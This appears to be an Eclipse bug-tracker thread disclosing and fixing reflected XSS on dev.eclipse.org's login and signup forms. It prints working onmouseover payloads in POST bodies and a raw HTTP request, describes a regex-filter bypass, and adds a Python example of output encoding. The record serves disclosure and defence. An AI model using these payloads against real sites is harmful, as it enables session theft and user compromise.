You don't filter these parameters:
--------------------------------------------------------------------------
password
Example vuln. POST-DATA:
password=g00dPa%2524%2524w0rD%22%20onmouseover%3dprompt(948410)%20bad%3d%22&remember=1&submit=Login&takemeback=https://dev.eclipse.org/site_login/&username=qumxeicy
--------------------------------------------------------------------------
takemeback
Example vuln. POST-DATA:
password=g00dPa%24%24w0rD&remember=1&submit=Login&takemeback=https://dev.eclipse.org/site_login/%22%20onmouseover%3dprompt(998306)%20bad%3d%22&username=dewoqurm
--------------------------------------------------------------------------
username
Example vuln. POST-DATA:
password=g00dPa%24%24w0rD&remember=1&submit=Login&takemeback=https://dev.eclipse.org/site_login/&username=dewoqurm%22%20onmouseover%3dprompt(980340)%20bad%3d%22
--------------------------------------------------------------------------
[ We are running these parameters through an XSS regexp; however, as the above values are urlencoded, they are getting through ]

2. This vuln. exists too on the next page, https://dev.eclipse.org/site_login/createaccount.php
vuln. parameters:
-------------------------------
password1
agree=1&fname=jalgyxyh&lname=jalgyxyh&password1=g00dPa%2524%2524w0rD%22%20onmouseover%3dprompt(937540)%20bad%3d%22&password2=g00dPa%24%24w0rD&skill=1&stage=create&submit=Create%20account%21&username=jalgyxyh
-------------------------------
password2
agree=1&fname=ykcfhlfm&lname=ykcfhlfm&password1=g00dPa%24%24w0rD&password2=g00dPa%2524%2524w0rD%22%20onmouseover%3dprompt(991996)%20bad%3d%22&skill=1&stage=create&submit=Create%20account%21&username=ykcfhlfm
-------------------------------
username
agree=1&fname=dlqvrbjk&lname=dlqvrbjk&password1=g00dPa%24%24w0rD&password2=g00dPa%24%24w0rD&skill=1&stage=create&submit=Create%20account%21&username=dlyhwydp%22%20onmouseover%3dprompt(942734)%20bad%3d%22
-------------------------------
[ As above... we need to either strengthen our XSS regexp, or urldecode() values before regexp ]

3.
POST /site_login/ HTTP/1.1
Content-Length: 152
Content-Type: application/x-www-form-urlencoded
Referer: https://dev.eclipse.org/
Cookie: PHPSESSID=h9uih2i4072vi16sdctt6uiq0km39tn0
Host: dev.eclipse.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

password=g00dPa%24%24w0rD&remember=1%20onmouseover%3dprompt(992892)%20y%3d&submit=Login&takemeback=https://dev.eclipse.org/site_login/&username=kfrfttat

vuln. remember parameter.

Vahagn Vardanyan, special for eclipse :)
[ Indeed, the "remember" parameter gets passed onto the form without sanitization ]
From the security inbox:

Reflected XSS on site_login:

Method: POST
URL: https://dev.eclipse.org/site_login/
Param: Username or Password
Payload: x" onmouseover=prompt(5)>"

Proof: Attachments

Replicate:
Open firefox
Go to eclipse login page from above URL
Copy the payload into the username/password fields
Hit Submit
On the following page, hover your mouse over the username/password boxes

-M.
(In reply to Eclipse Webmaster from comment #1)
> From the security inbox:
>
> Reflected XSS on site_login:
>
> Method: POST
> URL: https://dev.eclipse.org/site_login/
> Param: Username or Password
> Payload: x" onmouseover=prompt(5)>"
>
> Proof: Attachments
>
> Replicate:
> Open firefox
> Go to eclipse login page from above URL
> Copy the payload into the username/password fields
> Hit Submit
> On the following page, hover your mouse over the username/password boxes
>
> -M.

I have a patch ready for review: https://git.eclipse.org/r/34074

After a quick talk with Matt and Eddie this morning, we've decided not to return a default value for passwords. I am using filter_var to filter out the default values.
http://php.net/manual/en/filter.filters.sanitize.php
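The two observations in this thread, that the urlencoded payloads slip past the XSS regexp (the webmaster's notes in comment 0) and that the submitted values are reflected back into the form (the patch discussed in comment #2), as an added Python example that is not part of the bug thread or of the Eclipse site code. The POST bodies are copied from the report; the blocklist pattern, the form markup, the unquoted rendering of the remember attribute and the helper names (`regex_filter_passes`, `reflect_vulnerable`, `reflect_fixed`, `event_handlers`) are assumptions built for illustration. It shows that a pattern run over the raw body misses the payload, that decoding until the string is stable before matching catches it, and that quoting and attribute-escaping each value on output (the Python analogue of what a PHP escaping/sanitizing filter does) leaves no event handler for a browser to see, whatever encoding the input arrived in.

```python
"""Reflected-XSS filter bypass versus output encoding.

Added example, not code from the Eclipse bug or site. The POST bodies are
copied from the report; everything else (the pattern, the form markup, the
helper names) is hypothetical and built for illustration.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, unquote

# Hypothetical blocklist standing in for the "XSS regexp" mentioned in the
# bug; the real pattern is not shown there.
XSS_RE = re.compile(r"<\s*script|\bon\w+\s*=|javascript\s*:", re.IGNORECASE)

# POST bodies taken from the report (password, username and remember cases).
PASSWORD_POST_BODY = (
    "password=g00dPa%2524%2524w0rD%22%20onmouseover%3dprompt(948410)%20bad%3d%22"
    "&remember=1&submit=Login&takemeback=https://dev.eclipse.org/site_login/"
    "&username=qumxeicy"
)
USERNAME_POST_BODY = (
    "password=g00dPa%24%24w0rD&remember=1&submit=Login"
    "&takemeback=https://dev.eclipse.org/site_login/"
    "&username=dewoqurm%22%20onmouseover%3dprompt(980340)%20bad%3d%22"
)
REMEMBER_POST_BODY = (
    "password=g00dPa%24%24w0rD&remember=1%20onmouseover%3dprompt(992892)%20y%3d"
    "&submit=Login&takemeback=https://dev.eclipse.org/site_login/&username=kfrfttat"
)


def fully_urldecode(value: str) -> str:
    """urldecode() until the string stops changing, so %2524 -> %24 -> $."""
    while True:
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded


def regex_filter_passes(raw_body: str) -> bool:
    """The flawed check: the pattern runs over the body as it arrived, where
    the quote and '=' it looks for are still %22 and %3d. Returns True when
    the filter would let the request through."""
    return XSS_RE.search(raw_body) is None


def regex_filter_passes_decoded(raw_body: str) -> bool:
    """The webmaster's proposal: decode first, then run the same pattern."""
    return XSS_RE.search(fully_urldecode(raw_body)) is None


def _post_params(raw_body: str) -> dict:
    """Decode the body once into a name -> value map, as PHP does for $_POST."""
    return {k: v[0] for k, v in parse_qs(raw_body, keep_blank_values=True).items()}


def reflect_vulnerable(raw_body: str) -> str:
    """Pre-patch style: submitted values written straight back into the form.
    The remember attribute is rendered unquoted here (an assumption made so
    that the report's quote-free remember payload can take effect)."""
    p = _post_params(raw_body)
    return (
        f'<input type="text" name="username" value="{p.get("username", "")}">\n'
        f'<input type="checkbox" name="remember" value={p.get("remember", "")}>'
    )


def reflect_fixed(raw_body: str) -> str:
    """Encode on output: every value is quoted and attribute-escaped, so a
    '"' or a space in the input can no longer start a new attribute. The
    blocklist then becomes defence in depth at most."""
    p = _post_params(raw_body)

    def q(s: str) -> str:
        return html.escape(s, quote=True)

    return (
        f'<input type="text" name="username" value="{q(p.get("username", ""))}">\n'
        f'<input type="checkbox" name="remember" value="{q(p.get("remember", ""))}">'
    )


class _HandlerFinder(HTMLParser):
    """Collect the on* attributes a browser would see on each tag."""

    def __init__(self) -> None:
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        for name, _ in attrs:
            if name.lower().startswith("on"):
                self.found.append((tag, name.lower()))


def event_handlers(markup: str) -> list:
    """Parse rendered markup and return (tag, handler) pairs; an empty list
    means the reflected value stayed inside its attribute."""
    finder = _HandlerFinder()
    finder.feed(markup)
    return finder.found


if __name__ == "__main__":
    for body in (PASSWORD_POST_BODY, USERNAME_POST_BODY, REMEMBER_POST_BODY):
        print("raw regex passes:", regex_filter_passes(body),
              "| decoded regex passes:", regex_filter_passes_decoded(body))
    print("vulnerable:", event_handlers(reflect_vulnerable(USERNAME_POST_BODY)))
    print("fixed:     ", event_handlers(reflect_fixed(USERNAME_POST_BODY)))
```

The point of checking the rendered markup with a parser rather than grepping for `onmouseover` is that it answers the question a browser will actually ask: does the reflected value end up as an attribute of its own? The vulnerable renderer produces one for both the quoted `username` payload and the unquoted `remember` payload; the fixed renderer produces none, and it does so without the blocklist having to anticipate every encoding an attacker might use.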
The patch was committed. Webmasters, please update dev.eclipse.org when you get the chance.
dev seems to be up-to-date.
(In reply to Denis Roy from comment #4)
> dev seems to be up-to-date.

Removing security flag. Closing bug.